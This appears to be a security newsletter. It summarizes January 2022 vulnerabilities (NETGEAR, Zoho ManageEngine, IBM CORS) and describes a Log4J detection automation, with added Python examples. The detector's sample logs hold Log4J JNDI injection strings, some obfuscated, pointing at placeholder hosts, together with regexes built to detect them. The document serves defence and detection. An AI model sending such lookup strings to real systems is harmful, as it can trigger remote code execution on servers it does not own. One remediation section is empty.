The LogicHub Security Roundup: January 2022 Edition

Hello, and welcome to the latest edition of the LogicHub Monthly Update! Each month we’ll be covering a broad view of this past month’s threats, a series of informative use cases seen this month by our teams, and a series of recommended articles, podcasts, and other useful resources.

HIGHLIGHT

Batch of NETGEAR Vulnerabilities

WHAT DOES IT DO?

NETGEAR routers are popular devices for home use. Along with the Nighthawk R6700 gaming router, a series of vulnerabilities was found in other versions of NETGEAR router firmware, including mishandling of IEEE 1905 protocols, various remote code execution vulnerabilities, and command injections affecting the device’s update functionality. These vulnerabilities can be found in the National Vulnerability Database.

POTENTIAL IMPACT

Many of these flaws are quite severe and should be carefully reviewed by users of NETGEAR routers. Some potential effects can include full device access, data theft, device manipulation, and possible privilege escalation.

REMEDIATION

Some of these vulnerabilities have been successfully patched, but many for the R6700 have not. Additionally, some of the hardware-related vulnerabilities (such as those involving MediaTek microchips) may be much more difficult to patch and must instead be mitigated.

MORE INFORMATION:

https://www.bleepingcomputer.com/news/security/netgear-leaves-vulnerabilities-unpatched-in-nighthawk-router/

HIGHLIGHT

Zoho ManageEngine Authentication Bypass

WHAT DOES IT DO?

Zoho ManageEngine is a popular IT management solution used by enterprises for desktop, mobile device, general patching, and other management purposes. In this vulnerability, Zoho ManageEngine Desktop Central is specifically affected by an authentication bypass vulnerability that was seen in active exploitation this past December.

POTENTIAL IMPACT

Attackers taking advantage of this vulnerability could gain unintended and unauthorized access to Desktop Central.

REMEDIATION

Several patches have been released to address this issue as of December 3rd. Users affected are urged to patch immediately.

MORE INFORMATION:

https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp

HIGHLIGHT

IBM Spectrum Protect Plus Cross-Origin Resource Sharing

WHAT DOES IT DO?

IBM Spectrum Protect Plus is a popular option for backup and data replication across all manner of data platforms. Cross-origin resource sharing (CORS) uses HTTP headers to let a web application load images, scripts, and other resources from other domains. This feature was enabled on Spectrum Protect Plus.

POTENTIAL IMPACT

The main problem with cross-origin resource sharing is its lack of predictability. If the outside domain suddenly serves malware and access control is not properly configured (as in this case), then that malware will be served in the requesting application. This can have disastrous effects on users.
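The access-control failure this passage refers to is a CORS policy that grants any requesting origin access to the application's responses, so a page on an unrelated domain can read what a logged-in user is entitled to see. The following is an added example, not IBM's code and not tied to any Spectrum Protect Plus setting, showing the weak reflect-any-origin handler beside an exact-match allowlist; the origins are constructed.

```python
# Constructed allowlist: the only origins permitted to call the API with credentials.
# Entries are full origins (scheme, host, port), because that is what a browser sends.
ALLOWED_ORIGINS = {"https://console.example.com", "https://admin.example.com:8443"}

def cors_headers_permissive(origin):
    """Weak policy: reflect whatever Origin arrives and allow credentials, so any page
    a logged-in user visits can read the application's authenticated responses."""
    return {"Access-Control-Allow-Origin": origin, "Access-Control-Allow-Credentials": "true"}

def cors_headers_strict(origin, allowlist=ALLOWED_ORIGINS):
    """Hardened policy: exact-match the whole origin against the allowlist. No wildcard,
    no prefix/suffix matching, and the opaque 'null' origin is never trusted."""
    if origin is None or origin == "null" or origin not in allowlist:
        return {}  # no CORS headers at all: the browser withholds the response from the page
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin"}  # keep caches from serving one origin's grant to another
```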

REMEDIATION
MORE INFORMATION:

https://exchange.xforce.ibmcloud.com/vulnerabilities/214956

Additional Threats

CUSTOMER USE CASE

Log4J Automation and Response

SUMMARY

Log4J was a major exercise in patience for every network admin, security engineer, and response team, and we were certainly no different. Though we faced our own hardships in producing an effective solution for Log4J, we can comfortably speak to some of the difficulties we witnessed. Besides the typical ‘spray and pray’ attempts on random servers across the web, we also witnessed widespread, targeted, pentest-style use of crafted Log4J strings by attackers. Thankfully, thanks to the automation described below, we were able to keep a close eye on clients and maintain an effective security posture.

AUTOMATED SOLUTION

The first step in any automated solution is to identify the signatures of the problem: in this case, a lot of LDAP activity and successful traffic out to the domains requested in the crafted strings. The next is to implement careful monitoring; we chose to link into some IP reputation checks, pull logs from different client sources to cross-reference, and create a case or alert upon discovery of a successful data transfer. The last is to ensure that the solution is tuned to satisfaction, which meant a lot of tuning against the different fuzzing methods we saw. After assigning scores based on severity and creating the cases, manual triage was performed. The fact that there was a comfortable number of cases for our MDR team to manually triage signaled that our automation was (and continues to be) a massive success.
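The pipeline described above, as an added example that is not LogicHub's code: normalize the lookup-string obfuscation seen in fuzzing, extract the callback host, cross-reference it against the server's egress logs and a reputation lookup, and score the result so that only confirmed data transfers open a case for manual triage. All log lines, addresses and the reputation table are constructed, and the scoring weights are assumptions.

```python
import re
# Constructed sample data, not customer logs: access logs from the exposed host 10.0.0.20
# (lookup strings arrive in the User-Agent), its egress firewall logs, and a stand-in feed.
WEB_LOGS = [
    '192.0.2.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.5 - - [12/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '192.0.2.6 - - [12/Dec/2021:10:02:15 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${lower:j}ndi:${::-l}dap://198.51.100.7:389/x}"',
    '192.0.2.7 - - [12/Dec/2021:10:03:30 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:dns://scan.example.net/probe}"',
]
EGRESS_LOGS = [
    "2021-12-12T10:01:08Z src=10.0.0.20 dst=203.0.113.10 dport=1389 action=allow bytes_out=2310",
    "2021-12-12T10:02:16Z src=10.0.0.20 dst=198.51.100.7 dport=389 action=deny bytes_out=0",
]
IP_REPUTATION = {"203.0.113.10": "malicious", "198.51.100.7": "unknown"}

# Lookup tricks fuzzers lean on: ${lower:X}/${upper:X} and defaults like ${::-X}, ${env:NOPE:-X}.
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.I)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{jndi:([a-z]+):/*([^/:}\s]+)(?::(\d+))?", re.I)

def normalize(text):
    """Collapse nested lookups, innermost first, until the string stops changing."""
    while True:
        new = _CASE.sub(lambda m: getattr(m.group(2), m.group(1).lower())(), text)
        new = _DEFAULT.sub(r"\1", new)
        if new == text:
            return text
        text = new

def confirmed_callbacks(egress_logs):
    """Destinations the server actually reached: connection allowed and bytes sent."""
    reached = set()
    for line in egress_logs:
        kv = dict(field.split("=", 1) for field in line.split()[1:])
        if kv["action"] == "allow" and int(kv["bytes_out"]) > 0:
            reached.add(kv["dst"])
    return reached

def score(web_logs, egress_logs, reputation):
    reached = confirmed_callbacks(egress_logs)
    findings = []
    for line in web_logs:
        m = _JNDI.search(normalize(line))
        if m:
            host = m.group(2)
            # 40 for the string alone, +30 for a confirmed callback, +30 for a known-bad host; >= 70 opens a case
            pts = 40 + (30 if host in reached else 0) + (30 if reputation.get(host) == "malicious" else 0)
            findings.append({"host": host, "callback": host in reached, "score": pts, "case": pts >= 70})
    return findings
```

Every matched string still yields a finding for tuning purposes; only the entry whose callback host was actually reached (and is known-bad) crosses the case threshold.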

BENEFITS TO THIS APPROACH

As with any automation that addresses a fast-growing problem, there has to be a careful balance between speed and effectiveness. Even then, the amount of time and energy spent on producing this automation is minuscule compared to the heavy workload that manual review of every log collector’s Log4J detections would have required, especially without the ability to cross-reference between sources. Because of the speed of this automation, we were able to alert concerned clients to possible malicious attempts in a timely manner.

Recommended Reading

This section contains some interesting reading related to the state of infosec today. These articles have a simple summary that explains the basic idea of the news and links to more information.
